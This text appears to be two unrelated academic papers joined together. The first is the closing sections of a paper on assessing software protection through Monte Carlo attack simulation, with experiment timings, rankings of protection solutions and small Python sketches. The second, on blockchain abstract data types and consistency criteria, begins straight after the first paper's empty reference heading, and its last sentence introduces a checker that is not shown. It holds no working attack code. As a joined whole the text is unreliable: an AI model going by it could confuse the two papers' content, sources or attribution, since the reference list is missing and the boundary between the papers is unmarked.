In this subsection, we introduce our novel Attack Simulation based Software Protection Assessment Method (ASSPAM), built on the MCAS and ASPCM described above. In ASSPAM, the main process is as follows. Users first set the software protection situation (selecting attack models from the "Attack Model Base"), including which attacks need to be considered and their weights. Then the ASPCM is triggered to select potential PSs (from the "PS Knowledge Base") to be compared and assessed. These potential PSs are run through the MCAS to generate the related probabilities of successful attack. Based on these probabilities, the ASPCM generates the comparison results between PSs with numeric confidences. In the last step, relying on these comparison outputs, users apply specific rules (from the "Rules Set") to select suitable PSs as the final assessment results of our ASSPAM. These results can be used to optimise PSs in the ASPIRE project [1]. In short, the ASSPAM executes the ASPCM and the MCAS as sub-routines to assess different PSs under the PSAM, in order to obtain suitable assessment results in terms of software protection requirements (rules).

V. IMPLEMENTATION

In this section, we illustrate our ASSPAM, with MCAS and ASPCM, through implementations and experiments on software protection assessment for developers and software companies. Generally speaking, the implementation of ASSPAM is introduced in the order MCAS, ASPCM, ASSPAM. Firstly, we use an example to illustrate the implementation of MCAS.
Then, we use specific PN based attack models to compare various PSs via ASPCM in terms of numeric confidences. Lastly, we analyse the results from ASPCM and generate suitable PSs with rule sets as the final protection assessment results of ASSPAM.

A. Implementation of MCAS

In this subsection, we use a prototype implementation of MCAS on the OTP attack to demonstrate the attack simulation process. We set the initial attacker effort ae_0 as a normally distributed random variable with mean 200 and variance 25. Based on the OTP attack model shown in Figure 1, the 11 transitions can be classified into four categories: Category 1, locating code pieces (T0, T6, T8, T9, T10, and T11); Category 2, bypassing or tampering with code pieces (T1, T4); Category 3, code injecting (T2, T5); and Category 4, NULL activities (T3). We conducted an attack experiment with students on these attack activities from 23 to 29 October 2015 at the University of East London, involving postgraduates (5 persons), PhD candidates (3 persons), and Post-Docs (4 persons). We use the time records of this experiment to support the setting of EC for each transition in the OTP attack model of Figure 1. For example, for the attack activities in Category 2 (bypassing or tampering with code pieces), the "attackers" in our experiments spent different times: the shortest was 10 minutes and the longest 75 minutes. So we can use 10 and 75 as the boundaries Min and Max of the related transitions T1 and T4, as discussed in Subsection III.B, and build ec as a uniform distribution. Similarly, for every other transition, ec can be built from the shortest and longest recorded times.
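Expanding the per-category time ranges into per-transition EC boundaries could be sketched as follows; the category keys and the dictionary layout are our own illustrative choices, while the transition groupings and ranges follow Figure 1 and Table 2:

```python
# Category -> (transitions, observed [min, max] minutes), following the
# groupings of Figure 1 and the time ranges of Table 2; the key names
# are our own shorthand.
CATEGORY_TIMES = {
    "locate_code":   (["T0", "T6", "T8", "T9", "T10", "T11"], (3, 120)),
    "bypass_tamper": (["T1", "T4"], (10, 75)),
    "code_inject":   (["T2", "T5"], (50, 110)),
    "null":          (["T3"], (0, 0)),
}

def ec_bounds_per_transition(category_times):
    """Expand per-category [min, max] attack times into per-transition
    uniform-distribution boundaries for EC, as in Subsection III.B."""
    bounds = {}
    for transitions, (lo, hi) in category_times.values():
        for t in transitions:
            bounds[t] = (lo, hi)
    return bounds

bounds = ec_bounds_per_transition(CATEGORY_TIMES)
# e.g. bounds["T1"] == (10, 75) and bounds["T3"] == (0, 0)
```

Each resulting pair then parameterises the uniform distribution of that transition's ec in the simulation.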
Table 2. Time ranges of the attack activity categories

<table>
<thead>
<tr>
<th>Category</th>
<th>Transitions</th>
<th>Time Range (mins)</th>
</tr>
</thead>
<tbody>
<tr><td>Category 1</td><td>T0, T6, T8, T9, T10, T11</td><td>[3, 120]</td></tr>
<tr><td>Category 2</td><td>T1, T4</td><td>[10, 75]</td></tr>
<tr><td>Category 3</td><td>T2, T5</td><td>[50, 110]</td></tr>
<tr><td>Category 4</td><td>T3</td><td>[0, 0]</td></tr>
</tbody>
</table>

The results of these experiments are summarised in Table 2. As can be observed, the time ranges of the participants' attack activities can be used to configure the transitions' EC to demonstrate our method. In future work, we will run this experiment with different groups of people, such as teams of ethical hackers, and collect more data so that the simulated attack processes match the real world more closely. Moreover, the "NULL" attack activities, like T3 in the OTP attack model of Figure 1, are attack steps that do not include any actual attack actions and are only used to represent the branching of multiple attack paths. Hence, the time range of T3 is [0, 0]: it consumes no attacker time. We thereby obtain the MCAS results depicted in Figure 4: the horizontal axis represents the number of SAPS rounds, and the vertical axis is the Probability of Successful Attack (PSA). As can be observed, when the number of SAPS rounds increases, the probability of successful attack becomes stable within the interval (2.05%, 2.22%). If we simulate the impact of different protection methods with correspondingly different ECs, as discussed in Subsection III.B, we obtain different results for PS comparison and protection assessment, as described in the next subsections.

Figure 4. Probabilities of Successful Attack by MCAS

B. Implementation of ASPCM

In this subsection, we discuss a prototype implementation of ASPCM, based on Subsection V.A, to demonstrate PS comparison. Figure 5.
PSAs based on different attacks and PSs

Currently, our "Attack Model Base" includes three PN based attack models (one of them is the OTP attack introduced before; the other two are attacks on White-Box Cryptography and on a SoftVM [17]), and our "PS Knowledge Base" currently includes ten PSs for protection assessment and software development. Note that these PSs are currently generated randomly from some existing protections [18] and will later be replaced by real usable PSs. For all these attacks and PSs, we execute MCAS repeatedly and generate the Probabilities of Successful Attack (PSAs) depicted in Figure 5. In Figure 5, all PSAs are listed per attack and PS: there are Attack_1 (the OTP attack), Attack_2 and Attack_3, and PSs from PS-1 to PS-10. For each PS, there are corresponding ECs for each transition in the PN based attack models, as discussed in Subsection III.B.

Table 3. PS lists ordered increasingly by PSA under each attack

<table>
<thead>
<tr>
<th>Attack</th>
<th>PS list ordered increasingly by PSA</th>
</tr>
</thead>
<tbody>
<tr>
<td>Attack_1</td>
<td>PS-8, PS-5, PS-9, PS-2, PS-6, PS-1, PS-10, PS-4, PS-3, PS-7</td>
</tr>
<tr>
<td>Attack_2</td>
<td>PS-4, PS-6, PS-9, PS-1, PS-10, PS-3, PS-2, PS-7, PS-8, PS-5</td>
</tr>
<tr>
<td>Attack_3</td>
<td>PS-5, PS-10, PS-8, PS-7, PS-4, PS-2, PS-6, PS-3, PS-1, PS-9</td>
</tr>
</tbody>
</table>

Based on the data in Figure 5, we can operate the ASPCM with confidences. In this part, we discuss these confidences for the different attacks. We can list all PSs under each attack, ordered increasingly by PSA, as in Table 3, to compare them. For Attack_1, we compare adjacent PSs pair by pair: PS-8 and PS-5, PS-5 and PS-9, PS-9 and PS-2, PS-2 and PS-6, PS-6 and PS-1, PS-1 and PS-10, PS-10 and PS-4, PS-4 and PS-3, PS-3 and PS-7. Figure 6 shows these comparisons under Attack_1.
The vertical coordinate is the value of the confidences in [0, 1], and the horizontal coordinate is the PS list from Table 3, Row 1. The two lines represent CC and NeuC between adjacent PSs in the ASPCM. For instance, for PS-8 and PS-5, the CC of the assertion "PS-8 is better than PS-5" is very low, and its NeuC is quite high. In other words, the assertion that PS-8 is better than PS-5 is not a "positive" one. On the other hand, for PS-3 and PS-7, the CC may be adequately high to make the assertion "PS-3 is better than PS-7" a "positive" one. What counts as "positive" and "adequately high" is decided by specific rules in the "Rules Set", implemented in the next subsection. Similarly, Figure 7 and Figure 8 show the confidences under Attack_2 and Attack_3. In brief, in this subsection we presented the implementation of ASPCM for PS comparison, based on MCAS.

C. Implementation of ASSPAM

In this subsection, we discuss ASSPAM's implementation, especially the components "Analysis and Assessment" and "Rules Set" of Figure 3, based on the previous subsections. The implementation of ASSPAM needs to consider the multiple attack threats present in real software development and protection processes. Specifically, all attacks need to be evaluated together using specific weights. In this regard, consider a real software protection situation in which the weight of Attack_1 is 1.0 (this attack is the main concern), the weight of Attack_2 is 0.0 (Attack_2 is not considered), and the weight of Attack_3 is 0.3 (Attack_3 is considered, but is not as important as Attack_1). A single attack threat can be viewed as a special case in which one attack's weight is 1.0 and all others are 0.0. Hence, in this specific situation, we can obtain a PS list ordered increasingly by the weighted sum of each PS's PSAs under the different attacks, as in Table 4. The obtained confidences are depicted in Figure 9.
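The weighted aggregation just described, together with the confidence formulas (5) and (6) from Subsection IV.B, can be sketched as follows; the PSA numbers and weights below are made up for illustration, since the real values come from MCAS runs:

```python
def compare_confidence(p1, p2):
    """Eq. 5: confidence in 'PS-1 is better than PS-2' (a lower
    attack-success probability means better protection)."""
    return p2 - p1

def neutral_confidence(p1, p2):
    """Eq. 6: probability that the two PSs cannot be distinguished,
    i.e. both are broken or both resist: p1*p2 + (1-p1)*(1-p2)."""
    return 1 + 2 * p1 * p2 - p1 - p2

def weighted_psa(psa_per_attack, weights):
    """Aggregate one PS's attack-success probabilities over several
    attacks using the situation's weights."""
    return sum(weights[a] * p for a, p in psa_per_attack.items())

# Illustrative numbers only; the paper's PSAs come from MCAS.
weights = {"Attack_1": 1.0, "Attack_2": 0.0, "Attack_3": 0.3}
psas = {
    "PS-8": {"Attack_1": 0.02, "Attack_2": 0.30, "Attack_3": 0.08},
    "PS-5": {"Attack_1": 0.03, "Attack_2": 0.35, "Attack_3": 0.05},
}
ranked = sorted(psas, key=lambda ps: weighted_psa(psas[ps], weights))
```

Rules such as Rule 1 and Rule 2 below are then simple threshold predicates on `compare_confidence` and `neutral_confidence` applied to adjacent entries of `ranked`.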
In Figure 9, the vertical coordinate is the value of the confidences in [0, 1], and the horizontal coordinate is the PS list from Table 4, Row 1. The four lines represent CC and NeuC between adjacent PSs under Attack_1 and Attack_3 (the attacks with non-zero weights). This figure gives an intuitive and detailed picture of the assessment of all PSs in this specific situation. For instance, the assertion that PS-8 is better than PS-5 may not be very "positive", while for PS-2 and PS-1 the CC may be adequate to make the assertion "PS-2 is better than PS-1" a "positive" one. In this regard, different developers and software companies have their own knowledge of what counts as "positive" and "adequate", captured in their own specific "Rules Sets". For example, Rule 1 is "if NeuC is less than 0.85, the two PSs are different from the viewpoint of protection assessment", which means "positive". A different rule, Rule 2, is "if |CC| is smaller than 0.01 and NeuC is more than 0.7, the two PSs are the same", which means "not positive". Based on these rules, we obtain the assessment results of Table 5. In Table 5, under Rule 1, PS-8, PS-5 and PS-2 are the three best PSs in the assessment results; under Rule 2, PS-8 and PS-5 are the two best PSs, PS-6 and PS-10 are considered the same, and likewise PS-1 and PS-9. With no rule, only one PS, PS-8, is selected as the assessment result. Therefore, customer-defined rules provide flexible sets of PSs as assessment results, compared to Table 5, Row 1. This flexibility is also valuable in our ASPIRE project, as it provides alternatives for protection assessment in real software protection situations. Table 5.
Assessment Results depending on Rules

<table>
<thead>
<tr>
<th>Rules</th>
<th>Assessment Results</th>
</tr>
</thead>
<tbody>
<tr>
<td>No Rule</td>
<td>PS-8 &gt; PS-5 &gt; PS-2 &gt; PS-6 &gt; PS-10 &gt; PS-4 &gt; PS-1 &gt; PS-9 &gt; PS-3 &gt; PS-7</td>
</tr>
<tr>
<td>Rule 1</td>
<td>PS-8 = PS-5 = PS-2 &gt; PS-6 &gt; PS-10 &gt; PS-4 &gt; PS-1 &gt; PS-9 &gt; PS-3 &gt; PS-7</td>
</tr>
<tr>
<td>Rule 2</td>
<td>PS-8 = PS-5 &gt; PS-2 &gt; PS-6 = PS-10 &gt; PS-4 &gt; PS-1 &gt; PS-9 &gt; PS-3 &gt; PS-7</td>
</tr>
<tr>
<td>......</td>
<td>......</td>
</tr>
</tbody>
</table>

So far, for this specific software protection situation, our ASSPAM provides Figure 9 and Table 5 as the final protection assessment results for developers and software companies: Table 5 lists the preferred PSs under flexible rules, and Figure 9 shows the details behind them, such as the confidences of the PS comparisons. In summary, for real uncertain software attack processes, our Attack Simulation based Software Protection Assessment Method (ASSPAM), with its Monte Carlo based Attack Simulation (MCAS) and Attack Simulation based Protection Comparison Model (ASPCM), can assess complicated Protection Solutions (PSs) effectively.

VI. CONCLUSIONS AND FUTURE WORK

Software protection is a critical aspect of software security. To assess complicated Protection Solutions (PSs) under uncertain attack processes, we presented a novel attack simulation based protection assessment method called ASSPAM. In this method, a Monte Carlo based Attack Simulation (MCAS) uses PN based attack models to simulate attack processes under different PSs. Based on this attack simulation, a novel Attack Simulation based Protection Comparison Model (ASPCM) was presented to generate comparisons among potential PSs. Finally, ASSPAM was presented to assess software protections via the PS comparison results of ASPCM and MCAS.
We implemented ASSPAM by means of a software protection assessment process to demonstrate that our method can provide suitable assessments for software developers. For future work, we plan to extend our approach by using software metrics to improve the assessment methodology, and to search for the optimal protection solution in other case studies, such as digital rights management. ACKNOWLEDGEMENT This research is supported by the European Union Seventh Framework Programme (FP7/2007-2013) under grant agreement no. 609734, project ASPIRE [1]. The work of Christophe Tarty is supported by the German Federal Ministry of Education and Research (BMBF) through funding for the project PROMISE (No. 16KIS0362K). Part of Christophe Tarty’s research was done while he was still affiliated with the University of East London, where his research was supported by a Mid-Career Researchers award from the university. REFERENCES
Blockchain Abstract Data Type Emmanuelle Anceaume†, Antonella Del Pozzo*, Romaric Ludinard**, Maria Potop-Butucaru†, Sara Tucci-Piergiovanni† †CNRS, IRISA *CEA LIST, PC 174, Gif-sur-Yvette, 91191, France ** IMT Atlantique, IRISA †Sorbonne Université, CNRS, Laboratoire d’Informatique de Paris 6, LIP6, Paris, France Abstract—The presented work continues the line of recent distributed computing community efforts dedicated to the theoretical aspects of blockchains. This paper is the first to specify blockchains as a composition of abstract data types, together with a hierarchy of consistency criteria that formally characterizes the histories admissible for distributed programs that use them. Our work is based on an original oracle-based construction that, along with new consistency definitions, captures the eventual convergence process in blockchain systems. The paper also presents some results on the implementability of the presented abstractions and a mapping of representative existing blockchains, from both academia and industry, into our framework. I. INTRODUCTION The paper proposes a new data type to formally model blockchains and their behavior. We aim at providing consistency criteria that capture the correct behavior of current blockchain proposals in a unified framework. It is already known that some blockchain implementations solve eventual consistency of an append-only queue using Consensus [5], [4]. The question concerns the consistency criterion of blockchains such as Bitcoin [19] and Ethereum [24], which technically do not solve Consensus, and their relation with Consensus in general. We advocate that the key point to capture blockchain behaviors is to define consistency criteria allowing mutable operations to create forks and restricting the values read, i.e.
modeling the data structure as an append-only tree rather than an append-only queue. This way we can easily define semantics equivalent to an eventually consistent append-only queue, as well as weaker semantics. In more detail, we define a semantics equivalent to an eventually consistent append-only queue by restricting any two reads to return two chains such that one is the prefix of the other. We call this consistency property Strong Prefix (already introduced in [14]). Additionally, we define a weaker semantics restricting any two reads to return chains that have a divergent prefix only for a finite interval of the history. We call this consistency property Eventual Prefix. Note that our consistency criteria, specifically defined for blockchain systems, have a flavor similar to fork-consistency as defined in [18], which concerns a different area, namely data integrity in the network file system domain. Another peculiarity of blockchains lies in the notion of validity of blocks, i.e. the blockchain must contain only blocks that satisfy a given predicate. Let us note that validity can be achieved through proof-of-work (Dwork and Naor [11]) or other agreement mechanisms. We advocate that, to abstract away implementation-specific validation mechanisms, the validation process must be encapsulated in an oracle model separated from the process of updating the data structure. Because the oracle is the only generator of valid blocks and only valid blocks can be appended to the tree, it follows that the oracle grants access to the data structure, and it may also own a synchronization power to control the size of forks, i.e., the number of blocks that point back to the same block of the tree. In this respect we define oracle models such that, depending on the model, the size $k$ of forks can be equal to 1 (i.e., the strongest oracle model), strictly greater than 1, or unbounded (i.e., the weakest oracle model).
The blockchain is thus abstracted by an oracle-based construction in which the update and consistency of the tree data structure depend on the validation and synchronization power of the oracle. The main contribution of the paper is a formal unified framework providing blockchain consistency criteria that can be combined with oracle models in a proper hierarchy of abstract data types [23], independent of the underlying communication and failure models. Thanks to this formal framework, the following implementability results are shown.
- The strongest oracle, guaranteeing no fork, has Consensus number $\infty$ in the Consensus hierarchy of concurrent objects [15] (Theorem V.2). Note that, similarly to [8], [13], [7], we extend the validity property of Consensus to fit the blockchain setting.
- The weakest oracle, which validates a potentially unbounded number of blocks to be appended to a given block, is not stronger than Generalized Lattice Agreement [12].
- It is impossible to guarantee Strong Prefix in a message-passing system if forks of size $k > 1$ are allowed (Theorem V.6). This means that Strong Prefix needs the strongest oracle to be implemented, which is at least as strong as Consensus.
- A necessary condition (Theorem V.5) for Eventual Prefix in a message-passing system is that each update sent by a correct process must eventually be received by every correct process. Moreover, the result implies that it is impossible to implement Eventual Prefix if even a single update is dropped at some correct process while it has been received at all the other correct processes.

The proposed framework along with the above-mentioned results helps in classifying existing blockchains in terms of their consistency and implementability. We used the framework to classify several blockchain proposals.
We showed that Bitcoin [19] and Ethereum [24] have a validation mechanism that maps to our weakest oracle, and hence they only implement Eventual Prefix, while other proposals map to our strongest oracle, falling in the class of those that guarantee Strong Prefix (e.g. Hyperledger Fabric [4], PeerCensus [9], ByzCoin [16]; see Section V-C for further details). Note that for space reasons all the proofs of theorems and lemmas and some formal definitions do not appear in this article; they are presented in the supplementary materials [3]. II. RELATED WORK In [20] the authors extract the Bitcoin backbone protocol and define invariants that this protocol has to satisfy in order to guarantee, with high probability, an eventually consistent prefix. This line of work has been continued by [21]. However, to the best of our knowledge, no previous attempt proposed a unified consistency framework and hierarchy capturing both Consensus-based and proof-of-work based blockchains. In [1], the authors present a study of the relationship between Byzantine fault tolerant consensus and blockchains. In order to abstract out the proof-of-work mechanism, the authors propose a specific oracle, in the same spirit as our oracle abstraction, but more specific than ours, since it makes direct reference to proof-of-work properties. In parallel and independently of our work, [5] proposes a formalization of distributed ledgers modeled as ordered lists of records. The authors propose in their formalization three consistency criteria: eventual consistency, sequential consistency and linearizability. Interestingly, they show that a distributed ledger that provides eventual consistency can be used to solve the consensus problem. These findings confirm our results about the necessity of Consensus to solve Strong Prefix. On the other hand, the proposed formalization does not include weaker consistency semantics more suitable for proof-of-work blockchains such as Bitcoin.
The work achieved in [5] is complementary to the one presented in [2], where the authors study the consistency of the blockchain by modeling it as a register. Finally, [14] presents an implementation of the Monotonic Prefix Consistency (MPC) criterion and shows that no criterion stronger than MPC can be implemented in a partition-prone message-passing system. III. PRELIMINARIES ON SHARED OBJECT SPECIFICATIONS BASED ON ABSTRACT DATA TYPES The basic idea underlying the use of abstract data types is to specify shared objects using two complementary facets [22]: a sequential specification that describes the semantics of the object, and a consistency criterion over concurrent histories, i.e. the set of admissible executions in a concurrent environment. A. Abstract Data Type (ADT) The model used to specify an abstract data type is a form of transducer, like Mealy machines, accepting an infinite but countable number of states. In the following, an abstract data type refers to a 6-tuple $T = (A, B, Z, \xi_0, \tau, \delta)$. The values that can be taken by the data type are encoded in the abstract state, taken from a set $Z$. We denote by $\xi_0 \in Z$ the initial state of the ADT. It is possible to access the object using the symbols of an input alphabet $A$. Unlike the methods of a class, the input symbols of the abstract data type do not have arguments. Indeed, as one authorizes a potentially infinite set of operations, the call of the same operation with different arguments is encoded by different symbols. An operation can have two types of effects. First, it can have a side-effect that changes the abstract state according to the transition system formalized by a transition function $\tau$. Second, operations can return values taken from an output alphabet $B$, which depend on the state in which they are called and an output function $\delta$. For example, the pop operation in a stack removes the element at the top of the stack and returns that element (its output). B.
Sequential specification of an ADT An abstract data type, by its transition system, defines the sequential specification of an object. The sequential specification of an object describes its behavior when its operations are applied sequentially. That is, if we consider a path that traverses its system of transitions, then the word formed by the subsequent labels on the path is part of the sequential specification of the abstract data type, i.e. it is a sequential history. A sequential history of an ADT $T$ refers to a sequence $(\sigma_i)_{i \geq 0}$ (finite or not) of operations leading the state of $T$ to evolve according to its specification [3]. 1) Concurrent histories of an ADT: Concurrent histories are defined considering a partial order relation among events executed by different processes. A set of processes invoking operations of an ADT defines a concurrent history. Operations are not executed instantaneously, i.e., given an operation $o \in \Sigma = A \cup (A \times B)$, we denote by $e_{inv}(o)$ the invocation event of operation $o$ and by $e_{rsp}(o)$ the corresponding response event. In addition, we denote by $e_{rsp}(o) : x$ the value $x$ returned by the response event $e_{rsp}(o)$. In the following, $E$ represents the set of events and $\Lambda$ is the function which associates events to the operations in $\Sigma$. Given two events $(e, e') \in E^2$, we say that $e \mapsto e'$ in the process order if they are produced by the same process, $e \neq e'$ and $e$ happens before $e'$. Given two events $e, e' \in E$, we say that $e$ precedes $e'$ in the operation order, denoted by $e \prec e'$, if $e'$ is the invocation of an operation occurring at time $t'$ and $e$ is the response of another operation occurring at time $t$ with $t < t'$. Finally, for any couple of events $(e, e') \in E^2$ with $e \neq e'$, we say that $e$ precedes $e'$ in the program order, denoted by $e \nearrow e'$, if $e \mapsto e'$ or $e \prec e'$.
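As a toy illustration (not from the paper), the three order relations can be made concrete by representing events as records carrying a process identifier and a timestamp; the names `Event`, `process_order`, `operation_order` and `program_order` below are ours:

```python
# Illustrative sketch: events as named tuples with a process id and a
# timestamp; each operation contributes an invocation ("inv") and a
# response ("resp") event. The three orders of the text over events e, e'.
from collections import namedtuple

Event = namedtuple("Event", "op kind proc time")  # kind: "inv" or "resp"

def process_order(e, ep):
    # e -> e' in the process order: same process, e happens before e'
    return e.proc == ep.proc and e != ep and e.time < ep.time

def operation_order(e, ep):
    # e precedes e' in the operation order: e is a response that occurs
    # strictly before the invocation e'
    return e.kind == "resp" and ep.kind == "inv" and e.time < ep.time

def program_order(e, ep):
    # e precedes e' in the program order: process order or operation order
    return process_order(e, ep) or operation_order(e, ep)

# Two sequential operations on process p1, one overlapping op on p2.
a_inv, a_resp = Event("a", "inv", "p1", 1), Event("a", "resp", "p1", 2)
b_inv = Event("b", "inv", "p2", 1.5)  # b overlaps operation a
c_inv = Event("c", "inv", "p1", 3)

print(program_order(a_resp, c_inv))    # True: same process, a before c
print(operation_order(a_resp, b_inv))  # False: a and b overlap
```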
These asymmetric event structures allow us to define a concurrent history of an ADT $T$ as a 6-tuple $H = (\Sigma, E, \Lambda, \mapsto, \prec, \nearrow)$ [3]. 2) Consistency criterion: A consistency criterion characterizes which concurrent histories are admissible for a given abstract data type. It can be viewed as a function that associates a concurrent specification to abstract data types. Given a consistency criterion $C$, an algorithm $A_T$ implementing the ADT $T$ is $C$-consistent if all the operations terminate and all the admissible executions are $C$-consistent, i.e. they satisfy consistency criterion $C$. IV. BlockTree and Token Oracle ADTs In this section we present the BlockTree and the Token Oracle ADTs along with their consistency criteria. A. BlockTree ADT We formalize the data structure implemented by blockchain-like systems as a directed rooted tree $bt = (V_{bt}, E_{bt})$ called BlockTree. Each vertex of the BlockTree is a block and any edge points backward to the root, called the genesis block. By convention, the root of the BlockTree is denoted by $b_0$. Two operations are provided: the append$(b)$ operation, which appends a new block $b$ to the BlockTree, and the read$(\cdot)$ operation, which returns a sequence of blocks of the BlockTree. This sequence of blocks is called the blockchain and is selected according to a function $f$ (see below). Only blocks satisfying some validity predicate $P$ can be appended to the BlockTree. Predicate $P$ is application dependent and mainly abstracts the creation process of a block, which may fail (returns false, denoted by $\perp$) or successfully terminate (returns true, denoted by $\top$). For instance, in Bitcoin, a block is considered valid if it can be connected to the current blockchain and does not contain double-spending transactions.
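A minimal sketch of the BlockTree structure just described, assuming blocks are plain strings and using the longest-chain rule as one possible selection function $f$ (the class and helper names are ours, not the paper's):

```python
# Illustrative sketch (assumptions: blocks are strings; the validity
# predicate P and the selection function f are stand-ins for the
# application-dependent ones in the text; f picks the longest chain).

GENESIS = "b0"

class BlockTree:
    def __init__(self):
        # each block maps to its parent; edges point back toward b0
        self.parent = {GENESIS: None}

    def append(self, block, parent, P):
        """Append `block` under `parent` iff P(block) holds; cf. append(b)."""
        if not P(block) or parent not in self.parent:
            return False
        self.parent[block] = parent
        return True

    def chain(self, leaf):
        """Path from b0 to `leaf` (the blockchain through that leaf)."""
        path = []
        while leaf is not None:
            path.append(leaf)
            leaf = self.parent[leaf]
        return list(reversed(path))

    def read(self):
        """Return {b0} ~ f(bt), with f = longest chain (ties broken lexicographically)."""
        leaves = set(self.parent) - set(self.parent.values())
        best = max(leaves, key=lambda b: (len(self.chain(b)), b))
        return self.chain(best)

P = lambda b: b.startswith("b")  # toy validity predicate
bt = BlockTree()
bt.append("b1", GENESIS, P)
bt.append("b2", "b1", P)
bt.append("b1x", GENESIS, P)     # a fork on the genesis block
print(bt.read())                 # the longest chain wins
```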
We represent by $B$ a countable and non-empty set of blocks and by $B' \subseteq B$ a countable and non-empty set of valid blocks, i.e., $\forall b \in B', P(b) = \top$. By assumption, $b_0 \in B'$. We also denote by $BC$ a countable non-empty set of blockchains, where a blockchain is a path from a leaf of $bt$ to $b_0$. A blockchain is denoted by $bc$. Finally, $F$ is a countable non-empty set of selection functions, $f \in F : BT \to BC$; $f(bt)$ selects a sequence of blocks $bc$ from the BlockTree $bt$ (note that $b_0$ is not returned), and if $bt = b_0$ then $f(b_0) = b_0$. This reflects for instance the longest chain or the heaviest chain used in some blockchain implementations. The selection function $f$ and the predicate $P$ are parameters of the ADT which are encoded in the state and do not change over the computation. The following notations are used: $\{b_0\} \sim f(bt)$ represents the concatenation of $b_0$ with the blockchain selected from $bt$; and $\{b_0\} \sim f(bt) \sim \{b\}$ represents the concatenation of $b_0$ with the blockchain selected from $bt$ and a block $b$. 1) Sequential specification of the BlockTree: The sequential specification of the BlockTree is defined as follows.
**Definition IV.1 (BlockTree ADT (BT-ADT)).** The BlockTree Abstract Data Type is the 6-tuple BT-ADT $= (A = \{\text{append}(b), \text{read}() : b \in B\}, B = BC \cup \{\text{true}, \text{false}\}, Z = BT \times F \times (B \to \{\text{true}, \text{false}\}), \xi_0 = (b_0, f, P), \tau, \delta)$, where the transition function $\tau : Z \times A \to Z$ is defined by $$\tau((bt, f, P), \text{read}()) = (bt, f, P)$$ $$\tau((bt, f, P), \text{append}(b)) = \begin{cases} ((\{b_0\} \sim f(bt) \sim \{b\}), f, P) & \text{if } b \in B' \\ (bt, f, P) & \text{otherwise} \end{cases}$$ and the output function $\delta : Z \times A \to B$ is defined by $$\delta((bt, f, P), \text{read}()) = \begin{cases} \{b_0\} & \text{if } bt = b_0 \\ \{b_0\} \sim f(bt) & \text{otherwise} \end{cases}$$ $$\delta((bt, f, P), \text{append}(b)) = \begin{cases} \text{true} & \text{if } b \in B' \\ \text{false} & \text{otherwise} \end{cases}$$ The semantics of the read and the append operations directly depend on the selection function $f \in F$. In this work we keep this function generic to suit the different blockchain implementations. Figure 1 illustrates an execution of the BT-ADT. Starting from the initial state $\xi_0$, state $\xi_1$ is obtained by appending block $b_1$ to $\xi_0$ and state $\xi_2$ is obtained by appending block $b_2$ to $\xi_1$. The read operation applied in state $\xi_1$ returns blockchain $\{b_0\} \sim \{b_1\}$, and the read applied in state $\xi_2$ returns blockchain $\{b_0\} \sim f(bt) \sim \{b_2\} = \{b_0\} \sim \{b_1\} \sim \{b_2\}$. 2) Concurrent histories of a BT-ADT and consistency criteria: A BT-ADT consistency criterion is a function that returns the set of concurrent histories admissible for a BlockTree abstract data type. We define two BT consistency criteria: BT Strong consistency and BT Eventual consistency. For ease of readability, we employ the following notations: - $E(a^*, r^*)$ refers to an infinite set containing an infinite number of append$(\cdot)$ and read$(\cdot)$ invocation and response events.
Similarly, $E(a, r^*)$ refers to an infinite set containing (i) a finite number of append$(\cdot)$ invocation and response events and (ii) an infinite number of read$(\cdot)$ invocation and response events; - $score : BC \to \mathbb{N}$ denotes a monotonically increasing deterministic function that takes as input a blockchain $bc$ and returns a natural number $s$ as the score of $bc$, which can be, e.g., the depth or the weight of $bc$. Informally we refer to this value as the score of a blockchain; by convention, the score of the blockchain uniquely composed of the genesis block is $s_0$, i.e. $score(\{b_0\}) = s_0$. Increasing monotonicity means that $score(bc \sim \{b\}) > score(bc)$; - $mcps : BC \times BC \to \mathbb{N}$ is a function which, given two blockchains $bc$ and $bc'$, returns the score of the maximal common prefix of $bc$ and $bc'$; - $bc \sqsubseteq bc'$ iff $bc$ is a prefix of $bc'$. We now present the BT Strong Consistency criterion. Informally, it says that any two read$(\cdot)$ operations return blockchains such that one is the prefix of the other. This is formalized through the following four properties. The Block validity property imposes that each block in a blockchain returned by a read$(\cdot)$ operation is valid (i.e., satisfies predicate \( P \)) and has previously been inserted in the BlockTree with the \( \text{append}() \) operation. Formally, **Definition IV.2** (Block validity). \( \forall e_{\text{resp}}(r) \in E, \forall b \in e_{\text{resp}}(r) : bc, b \in B' \land \exists e_{\text{inv}}(\text{append}(b)) \in E, e_{\text{inv}}(\text{append}(b)) \nearrow e_{\text{resp}}(r) \) The Local monotonic read property states that, given the sequence of \( \text{read}() \) operations at the same process, the score of the returned blockchain never decreases. Formally, **Definition IV.3** (Local monotonic read).
\( \forall e_{\text{resp}}(r), e_{\text{resp}}(r') \in E^2, e_{\text{resp}}(r) \mapsto e_{\text{resp}}(r'), \text{then } \text{score}(e_{\text{resp}}(r) : bc) \leq \text{score}(e_{\text{resp}}(r') : bc') \) The Strong prefix property says that for each pair of \( \text{read}() \) operations, one of the returned blockchains is a prefix of the other. Formally, **Definition IV.4** (Strong prefix). \( \forall e_{\text{resp}}(r), e_{\text{resp}}(r') \in E^2, (e_{\text{resp}}(r') : bc' \sqsubseteq e_{\text{resp}}(r) : bc) \lor (e_{\text{resp}}(r) : bc \sqsubseteq e_{\text{resp}}(r') : bc') \) Finally, the Ever growing tree property states that the scores of returned blockchains eventually grow. More precisely, let \( s \) be the score of the blockchain returned by a read response event \( r \) in \( E(a^*, r^*) \); then for each \( \text{read}() \) operation \( r \), the set of \( \text{read}() \) operations \( r' \) such that \( e_{\text{resp}}(r) \nearrow e_{\text{inv}}(r') \) that do not return blockchains with a score greater than \( s \) is finite. Formally, **Definition IV.5** (Ever growing tree). \( \forall e_{\text{resp}}(r) \in E(a^*, r^*), s = \text{score}(e_{\text{resp}}(r) : bc) \text{ then } |\{e_{\text{inv}}(r') \in E \mid e_{\text{resp}}(r) \nearrow e_{\text{inv}}(r'), \text{score}(e_{\text{resp}}(r') : bc') \leq s\}| < \infty \) **Definition IV.6** (BT Strong Consistency (SC) criterion). A concurrent history \( H = (\Sigma, E, \Lambda, \mapsto, \prec, \nearrow) \) of the system that uses a BT-ADT verifies the BT Strong Consistency criterion if the Block validity, Local monotonic read, Strong prefix and Ever growing tree properties hold. We now present the BT Eventual Consistency criterion, a weaker version of the Strong Consistency criterion.
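Before turning to the weaker criterion, the prefix-based properties can be sketched concretely. The following illustrative checker (names are ours; score is taken to be the chain length, one admissible monotonically increasing score) tests Strong prefix and Local monotonic read over the chains returned by a sequence of read() responses at one process, and also computes mcps:

```python
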